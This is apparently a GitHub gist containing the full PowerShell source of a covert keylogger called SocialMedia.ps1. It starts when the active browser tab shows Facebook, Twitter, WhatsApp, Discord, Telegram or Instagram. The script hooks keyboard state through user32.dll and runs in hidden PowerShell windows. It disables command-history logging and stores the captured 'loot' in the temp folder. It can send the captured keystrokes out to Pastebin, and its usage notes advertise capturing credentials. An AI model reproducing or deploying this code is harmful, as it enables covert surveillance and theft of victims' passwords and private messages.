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Last active August 26, 2024 07:05
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WhatsApp, Facebook, Twitter, Discord, Telegram, Instagram -- active browser tab keystrokes keylogger
Active browser tab keyboad keystrokes capture
Author: @r00t-3xp10it
Tested Under: Windows 10 (19044) x64 bits
Required Dependencies: Get-Process,mscore.ps1
Optional Dependencies: Out-PasteBin.ps1
PS cmdlet Dev version: v1.5.20
Start record keyboard keystrokes if target has WhatsApp, Facebook,
Twitter, Discord, Telegram, Instagram in the 'active browser tab'
Browsers supported: MsEdge,Chrome,Chromium,Opera,Safari,Firefox.
Multiple logfiles will be saved under target %TMP% directory with
the names 1_[random].Facebook OR 1_[random].Twitter [extensions]
This cmdlet starts recording keystrokes if target user has facebook
or twitter in the 'active tab' and stops recording whenever it detects
the exit of the social media tab. in that case it stops the key`logger
process, renames the logfile (loot) and waits for the social media to
be accessed again to start recording or to be told to stop recording.
1200 milliseconds (default) is the amount of time required for key`logger
to start execution and build pid.log file. If we chose to use less than 1
second delay then cmdlet executes more than one instance of powershell.
[ALL PIDs started previous, will be stoped by this cmdlet automatic]
Remark: pastebin webserver only accepts 20 pastes per day! (free account)
Remark: SendToPasteBin function sends loot's to pastebin in 2 diferent ways:
1 - Target user switchs from facebook tab to a diferent tab => SendToPasteBin
2 - Browser closes (key`logger waits for browser to restart) => SendToPasteBin
.Parameter Mode
Start or Stop key`logger (default: start)
.Parameter Delay
Milliseconds delay between loops (default: 1200)
.Parameter Force
Switch to bypass check: Is_Browser_Active?
.Parameter Schedule
Schedule cmdlet execution at: [HH:mm]
.Parameter SendToPasteBin
Switch to send loot to pastebin server
.Parameter PastebinUsername
PasteBin UserName to authenticate to
.Parameter PastebinPassword
PasteBin Password to authenticate to
.Parameter PastebinDeveloperKey
The pasteBin API key to authenticate with
PS C:\> .\SocialMedia.ps1 -mode 'start'
Start browser key`logger capture
PS C:\> .\SocialMedia.ps1 -delay '5000' -force
Use 5 seconds between each loop + bypass: Is_Browser_Active?
PS C:\> .\SocialMedia.ps1 -schedule '02:34' -mode 'start'
Schedule cmdlet capture to start at [HH:mm] hours
PS C:\> .\SocialMedia.ps1 -mode 'stop'
Stop key`logger and leak keystrokes on screen
PS C:\> .\SocialMedia.ps1 -mode 'stop' -sendtopastebin
Trigger SendToPasteBin function + stop key`logger + leak keystrokes
PS C:\> .\SocialMedia.ps1 -mode 'start' -PastebinUsername 'pedro_testing' -PastebinPassword 'angelapastebin' -SendToPasteBin
Start key`logger and send logfile to pastebin everytime target user changes\exit social media browser active tab
PS C:\> Start-Process -WindowStyle hidden powershell -argumentlist "-file SocialMedia.ps1 -mode 'start' -delay '200' -force"
Invoke SocialMedia cmdlet in a hidden windows console detach from parent process with the best chances (delay) of capture credentials
None. You cannot pipe objects into SocialMedia.ps1
╰➤ [01:23] 👁‍🗨 Social media key`logger 👁‍🗨
Social Media: Facebook
Logfile: 1_sdfsrs.Facebook
Social Media: Facebook
Logfile: 2_soimui.Facebook
hello chad, are you here? :P
[CmdletBinding(PositionalBinding=$false)] param(
$CmdletVersion = "v1.5.20"
$IPath = (Get-Location).Path
$CurrentTime = (Get-Date -Format 'HH:mm')
$ErrorActionPreference = "SilentlyContinue"
## Disable Powershell Command Logging for current session.
Set-PSReadlineOption –HistorySaveStyle SaveNothing|Out-Null
$StartBanner = @"
)\ ) ( ( (
(()/( ( ) )\ )\))( ( )\ ) ( )
/(_)) ( ( )\ ( /( ((_) ((_)()\ ))\ (()/( )\ ( /(
(_)) )\ )\((_) )(_)) _ (_()((_) /((_) ((_))(_) (_))
/ __| ((_) ((_)(_)((_)_ | | | \/ |(_)) _| |(_)((_)_
\__ \/ _ \/ _| | |/ _ || | | |\/| |/ -_)/ _ || |/ _ |
|___/\___/\__| |_|\__,_||_| |_| |_|\___|\__,_||_|\__,_|
write-host $StartBanner -ForegroundColor DarkRed
write-host "Capture keystrokes {from major social media sites}" -ForegroundColor DarkGray
write-host " ♟ GitHub: ♟" -ForegroundColor DarkYellow
$host.UI.RawUI.WindowTitle = "@SocialMedia $CmdletVersion {SSA@RedTeam}"
write-host " ╰➤ [" -ForegroundColor Green -NoNewline
write-host "$CurrentTime" -NoNewline
write-host "] 👁‍🗨 Social media key`logger 👁‍🗨" -ForegroundColor Green
## Browser names
$BrowserNames = @(
$RawCmdlet = @("function Keystrokes(){
[int]`$totalNumber = 0
echo `$pid >> `$Env:TMP\pid.log ## Store Process PID to be abble to stop it later!
`$Path = `"`$Env:TMP\void.log`"
`$signatures = @'
[DllImport(`"user32.dll`", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
[DllImport(`"user32.dll`", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport(`"user32.dll`", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport(`"user32.dll`", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
`$API = Add-Type -MemberDefinition `$signatures -Name 'Win32' -Namespace API -PassThru
`$null = Ni -Path `$Path -ItemType File -Force
For(`$ascii = 9; `$ascii -le 128; `$ascii++)
`$state = `$API::GetAsyncKeyState(`$ascii)
If(`$state -eq -32767)
`$null = [console]::CapsLock
`$virtualKey = `$API::MapVirtualKey(`$ascii, 3)
`$kbstate = New-Object Byte[] 256
`$checkkbstate = `$API::GetKeyboardState(`$kbstate)
`$mychar = New-Object -TypeName System.Text.StringBuilder
`$success = `$API::ToUnicode(`$ascii, `$virtualKey, `$kbstate, `$mychar, `$mychar.Capacity, 0)
[System.IO.File]::AppendAllText(`$Path, `$mychar, [System.Text.Encoding]::Unicode)
`$totalNumber = `$totalNumber+1
function Invoke-KillAllPids ()
Author: @r00t-3xp10it
Helper - Kill all key`logger PID's running.
$PPID = (Get-Content "$Env:TMP\pid.log" -EA SilentlyContinue|Where-Object { $_ -ne '' })
## Kill Process PID(s)
ForEach($KProcessId in $PPID)
## Check if process ID its running before try to stop it.
If([bool](Get-Process -Id "$KProcessId" -EA SilentlyContinue) -Match 'True')
## Stop key`logger process by is PPID
write-host " ╰➤ ⚙️ " -ForegroundColor Green -NoNewline
write-host "Stoping key`logger PID: " -NoNewline
write-host "$KProcessId" -ForegroundColor Green
Stop-Process -Id $KProcessId -Force
function Invoke-IsBrowserActive ()
Author: @r00t-3xp10it
Helper - Prevent cmdlet execution if browser closed!
$TestBrowsers = @()
ForEach($Tokens in $BrowserNames)
## Get names from active browsers only
$Stats = (Get-Process -Name "$Tokens").MainWindowHandle|Where-Object{$_ -NotMatch '^(0)$'}
$TestBrowsers += "$Tokens"
## Make sure we have active browser names
write-host "`n 📛 Error: none supported browsers found open.`n" -ForegroundColor Red
exit ## Exit cmdlet execution (default)
function Invoke-ScheduleStart ()
Author: @r00t-3xp10it
Helper - Schedule cmdlet execution! [HH:mm]
If($Schedule -match '^(\d\d:\d\d)$')
write-host " ╰➤ 🕘 " -ForegroundColor Red -NoNewline
write-host "Execution schedule to " -ForegroundColor Blue -NoNewline
write-host "$Schedule" -NoNewline
write-host " hours." -ForegroundColor Blue
## Compare $CurrentTime with $StartTime
$CurrentTime = (Get-Date -Format 'HH:mm')
If($CurrentTime -match "$Schedule")
break # Continue SocialMedia cmdlet execution
## loop each 10 seconds
Start-Sleep -Seconds 10
## Wrong schedule user input error msg
write-host " ╰➤ 📛 Abort: " -ForegroundColor Red -NoNewline
write-host "wrong schedule '" -NoNewline
write-host "$Schedule" -ForegroundColor Red -NoNewline
write-host "' input! [exec:" -NoNewline
write-host "now" -ForegroundColor Green -NoNewline
write-host "]`n"
function Invoke-SendToPasteBin ()
Author: @r00t-3xp10it
Helper - 🔥 Send loot(s) to pastebin website 🔥
Pastebin_Title_Example: Facebook_dsreds
Remark: pastebin webserver only accepts 20 pastes per day! (free account)
Remark: SendToPasteBin function sends loot's to pastebin in 2 diferent ways:
1 - Target user switchs from facebook tab to a diferent tab => SendToPasteBin
2 - Browser closes (key`logger waits for browser to restart) => SendToPasteBin
If(-not(Test-Path -Path "$PasteThisFile" -EA SilentlyContinue))
$PasteThisFile = "$Env:TMP\void.log"
If([bool](Test-Path -Path "$Env:TMP\Out-Pastebin.ps1") -match '^(True)$')
$RandomName = -join ((97..122)|Get-Random -Count 6|%{[char]$_})
write-host " ╰➤ 📮 Sending loot to pastebin webserver." -ForegroundColor Blue
write-host "`n Paste number : $Counter"
If($Counter -lt 20) ## <- MAX number of pastes allowed by pastebin per day
$PasteTitle = "$SocialSite"+"_"+"$RandomName" -join ''
write-host " Pastebin username : $PastebinUsername"
write-host " Pastebin password : $PastebinPassword"
write-host " Pastebin developerKey : " -NoNewline
write-host "$PastebinDeveloperKey" -ForegroundColor DarkYellow
write-host " Pastebin account Url : " -NoNewline
write-host "$PasteBinUserName" -ForegroundColor Green
write-host " Send to pastebin : $PasteThisFile"
write-host " Pastebin filename : $PasteTitle`n"
cd $Env:TMP
$RawData = (Get-Content -Path "$PasteThisFile" -EA SilentlyContinue)
## Execute Out-PasteBin cmdlet in a hidden console detach from parent process [SocialMedia process pid]
Start-Process -WindowStyle Hidden powershell -ArgumentList "Import-Module .\Out-PasteBin.ps1 -Force;Out-Pastebin -InputObject '$RawData' -PasteTitle '$PasteTitle' -ExpiresIn 1W -Visibility Private -PastebinUsername '$PastebinUsername' -PastebinPassword '$PastebinPassword' -PastebinDeveloperKey '$PastebinDeveloperKey'"
Start-Sleep -Seconds 5;write-host " 🎖️ Loot file deliver to pastebin server!" -ForegroundColor Blue
Start-Sleep -Seconds 2
cd $IPath
write-host " 📛 Error: Max pastebin pastes per day reached.`n" -ForegroundColor Red
function Invoke-CheckMediaForChange ()
Author: @r00t-3xp10it
Helper - Detect [facebook<->twitter] active tab changes.
If([bool](Test-Path -Path "$Env:TMP\Smeagol.log") -match '^(True)$')
If($StartKeys -match 'Discord'){$SocialSite = "Discord"}
If($StartKeys -match 'Telegram'){$SocialSite = "Telegram"}
If($StartKeys -match 'WhatsApp'){$SocialSite = "Whatsapp"}
If($StartKeys -imatch 'Facebook'){$SocialSite = "Facebook"}
If($StartKeys -match 'Instagram'){$SocialSite = "Instagram"}
If($StartKeys -imatch '/ X |'){$SocialSite = "Twitter"}
$LastAccessed = (Get-Content -Path "$Env:TMP\Smeagol.log" -EA SilentlyContinue)
If(-not($LastAccessed -match "^($SocialSite)$"))
write-host " ╰➤ ⛑️ " -ForegroundColor Green -NoNewline
write-host "move detected from " -ForegroundColor Red -NoNewline
write-host "$LastAccessed" -ForegroundColor Green -NoNewline
write-host " to " -ForegroundColor Red -NoNewline
write-host "$SocialSite" -ForegroundColor Green
## Stop key`logger PID(s)
If([bool](Test-Path -Path "$Env:TMP\pid.log") -match '^(True)$')
## Kill all PID's
## CleanUp -- Rename
If([bool](Test-Path -Path "$Env:TMP\void.log") -match '^(True)$')
[int]$Counter = [int]$Counter+1
## Random FileName generation - rename logfile [name+extension]
# This allows attackers to stop key`logger if target its not on social media
$Rand = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 6 |%{[char]$_})
$Name = "$Counter"+"_"+"$Rand" -join '' ## Add $Counter to beggining of Name to order creation
Move-Item -Path "$Env:TMP\void.log" -Destination "$Env:TMP\${Name}.${LastAccessed}" -Force
## Print info onscreen
write-host " ╰➤ ⚙️ " -ForegroundColor Green -NoNewline
write-host "logfile: " -NoNewline
write-host "void.log" -ForegroundColor Yellow -NoNewline
write-host " renamed to: " -NoNewline
write-host "${Name}.${LastAccessed}" -ForegroundColor Yellow
## Send loot to pastebin
$PasteThisFile = "$Env:TMP\${Name}.${LastAccessed}"
## CleanUP
Remove-Item -Path "$Env:TMP\pid.log" -Force
#Remove-Item -Path "$Env:TMP\AUTO_BACKUP.${SocialSite}" -Force
## CleanUp
Remove-Item -Path "$Env:TMP\Smeagol.log" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.${LastAccessed}" -Force
If($Mode -iMatch '^(start)$')
[int]$Counter = 0
$TestBrowsers = $BrowserNames
## Build mscore.ps1 cmdlet in %TMP%
echo $RawCmdlet|Out-File "$Env:TMP\mscore.ps1" -Encoding string -Force
## Schedule_Cmdlet_Start?
If(-not($Schedule -imatch '^(now)$'))
## Is_Browser_Active?
## Bypass check: Is_Browser_Active?
write-host " ╰➤ 🕘 Waiting for remote browser to open!" -ForegroundColor Yellow
iwr -uri "" -OutFile "$Env:TMP\Out-Pastebin.ps1"|Unblock-File
echo "`n"
## :meterpeter> requires this PID
$pid > "$Env:TMP\"
Author: @r00t-3xp10it
Helper - Loop funtion to capture keyboard keystrokes.
ForEach($Item in $TestBrowsers)
## Filter msedge process that runs in background by default
# and dont have any 'MainWindowTitle' strings to display ( empty )
$FilterEdge = (Get-Process -Name "$Item").MainWindowHandle|Where-Object{$_ -NotMatch '^(0)$'}
## Get browser Main Window Title (active tab)
$StartKeys = (Get-Process -Name "$Item").MainWindowTitle|Where-Object{$_ -NotMatch '^(0)$'}|Where-Object{$_ -ne ''}
If(($StartKeys -iMatch 'Facebook') -or ($StartKeys -iMatch '/ X |') -or ($StartKeys -Match 'WhatsApp') -or ($StartKeys -imatch 'Instagram') -or ($StartKeys -imatch 'Discord') -or ($StartKeys -imatch 'Telegram'))
## Detect social media changes
## Store last access social media
If($StartKeys -imatch 'Facebook')
$SocialSite = "Facebook"
echo "$SocialSite" > $Env:TMP\Smeagol.log
If($StartKeys -imatch '/ X |')
$SocialSite = "Twitter"
echo "$SocialSite" > $Env:TMP\Smeagol.log
If($StartKeys -match 'WhatsApp')
$SocialSite = "Whatsapp"
echo "$SocialSite" > $Env:TMP\Smeagol.log
If($StartKeys -imatch 'Instagram')
$SocialSite = "Instagram"
echo "$SocialSite" > $Env:TMP\Smeagol.log
If($StartKeys -imatch 'Discord')
$SocialSite = "Discord"
echo "$SocialSite" > $Env:TMP\Smeagol.log
If($StartKeys -imatch 'Telegram')
$SocialSite = "Telegram"
echo "$SocialSite" > $Env:TMP\Smeagol.log
## If pid.log does not exist = Start process
If(-not(Test-Path -Path "$Env:TMP\pid.log"))
## Print info onscreen
write-host " 🧶 Social media '" -ForegroundColor Green -NoNewline
write-host "$SocialSite" -NoNewline
write-host "' found active.." -ForegroundColor Green
write-host "`n Browser Name : $Item"
write-host " Social Media : $SocialSite"
write-host " Logfile : " -NoNewline
write-host "$Env:TMP\void.log`n" -ForegroundColor Green
## Execute key`logger in a hidden windows console detach from parent process
Start-Process -WindowStyle Hidden powershell -ArgumentList "-file $Env:TMP\mscore.ps1"
Start-Sleep -Milliseconds 1700 # Give extra time for execution
## Key`logger running -- backup void.log logfile
write-host " 💀 Key`logger running in background!"
Get-Content -Path "$Env:TMP\void.log" -EA SilentlyContinue|Out-File "$Env:TMP\AUTO_BACKUP.${SocialSite}" -force
write-host " 📛 Error: none social media found active!" -ForegroundColor Red
If([bool](Test-Path -Path "$Env:TMP\pid.log") -match '^(True)$')
## Kill all PID's
If([bool](Test-Path -Path "$Env:TMP\void.log") -match '^(True)$')
[int]$Counter = [int]$Counter+1
## Random FileName generation - rename logfile [name+extension]
# This allows attackers to stop key`logger if target its not on social media
$Rand = -join (((48..57)+(65..90)+(97..122)) * 80 |Get-Random -Count 6 |%{[char]$_})
$Name = "$Counter"+"_"+"$Rand" -join '' ## Add $Counter to beggining of Name to order creation
Move-Item -Path "$Env:TMP\void.log" -Destination "$Env:TMP\${Name}.${SocialSite}" -Force
## Print info onscreen
write-host " ╰➤ ⚙️ " -ForegroundColor Green -NoNewline
write-host "logfile: " -NoNewline
write-host "void.log" -ForegroundColor Yellow -NoNewline
write-host " renamed to: " -NoNewline
write-host "${Name}.${SocialSite}" -ForegroundColor Yellow
## Send loot to pastebin
$PasteThisFile = "$Env:TMP\${Name}.${SocialSite}"
## CleanUP
Remove-Item -Path "$Env:TMP\pid.log" -Force
Remove-Item -Path "$Env:TMP\Smeagol.log" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Discord" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Twitter" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Telegram" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Facebook" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Whatsapp" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Instagram" -Force
## Delay time between loops
Start-Sleep -Milliseconds $Delay
If($Mode -iMatch '^(stop)$')
Author: @r00t-3xp10it
Helper - Stop key`logger process (PID) and leak captures
Parameter SendToPasteBin is used in this function to
give time for Out-Pastebin cmdlet to finish is work!
PS C:\> .\SocialMedia.ps1 -mode 'stop' -sendtopastebin
## SendToPasteBin function
$UriList = @(
## ⛑️ Open new tab to invoke SendToPasteBin
cmd /R start /max $(Get-Random -InputObject $UriList)
Start-Sleep -Seconds 5
## Kill all PID's
$PPID = (Get-Content "$Env:TMP\pid.log" -EA SilentlyContinue|Where-Object { $_ -ne '' })
## Print info onscreen [header]
$System = (Get-CimInstance -ClassName CIM_OperatingSystem).Caption
$OSversion = (Get-CimInstance -ClassName CIM_OperatingSystem).Version
$NameDomain = (Get-CimInstance -ClassName CIM_OperatingSystem).CSName
write-host "`n`n Domain name : $NameDomain"
write-host " OS version : $OSversion"
write-host " Operative system : $System"
write-host "`n"
$GetLogNames = (dir $Env:TMP).Name|findstr /C:'.Facebook' /C:'.Twitter' /C:'.Whatsapp' /C:'.Instagram' /C:'.Discord' /C:'.Telegram' /C:'AUTO_BACKUP.'
ForEach($PreventDuplicate in $GetLogNames)
Author: @r00t-3xp10it
Helper - Prevent Duplicate Logfiles [AUTO_BACKUP]
$MbACKuPfILE = (dir $Env:TMP).Name|findstr /C:'AUTO_BACKUP.'
if(-not($PreventDuplicate -match '^(AUTO_BACKUP.)'))
## Compare all logs with AUTO_BACKUP. logfile
$diogene = (Get-Content "$Env:TMP\${MbACKuPfILE}")
$viriato = (Get-Content "$Env:TMP\${PreventDuplicate}")
If("$viriato" -match "$diogene")
$GetLogNames = (dir $Env:TMP).Name|findstr /C:'.Facebook' /C:'.Twitter' /C:'.Whatsapp' /C:'.Instagram' /C:'.Discord' /C:'.Telegram'|findstr /V 'AUTO_BACKUP.'
break ## Break loop after found two duplicated files = delete AUTO_BACKUP. from [output] table
ForEach($ReportFile in $GetLogNames)
Author: @r00t-3xp10it
Helper - [output] Leak captures OnScreen
## Get social media names from extension
$SocialSite = ($ReportFile).split('.')[1]
write-host "`nSocial Media: $SocialSite"
write-host "Logfile: $ReportFile"
write-host "----------------------------"
Get-Content -Path "$Env:TMP\${ReportFile}" -EA SilentlyContinue
Remove-Item -Path "$Env:TMP\${ReportFile}" -Force
write-host "----------------------------`n"
## CleanUP
Remove-Item -Path "$Env:TMP\*.log" -Force
Remove-Item -Path "$Env:TMP\Out-Pastebin.ps1" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Discord" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Twitter" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Telegram" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Facebook" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Whatsapp" -Force
Remove-Item -Path "$Env:TMP\AUTO_BACKUP.Instagram" -Force
write-host "`n 📛 Error: none key`logger logfiles found!`n" -ForegroundColor Red
## Final CleanUP
Remove-Item -Path "$Env:TMP\mscore.ps1" -Force
Remove-Item -Path "$Env:TMP\Out-Pastebin.ps1" -Force
Copy link

r00t-3xp10it commented Dec 11, 2023

:meterpeter:Keylogger> socialmedia






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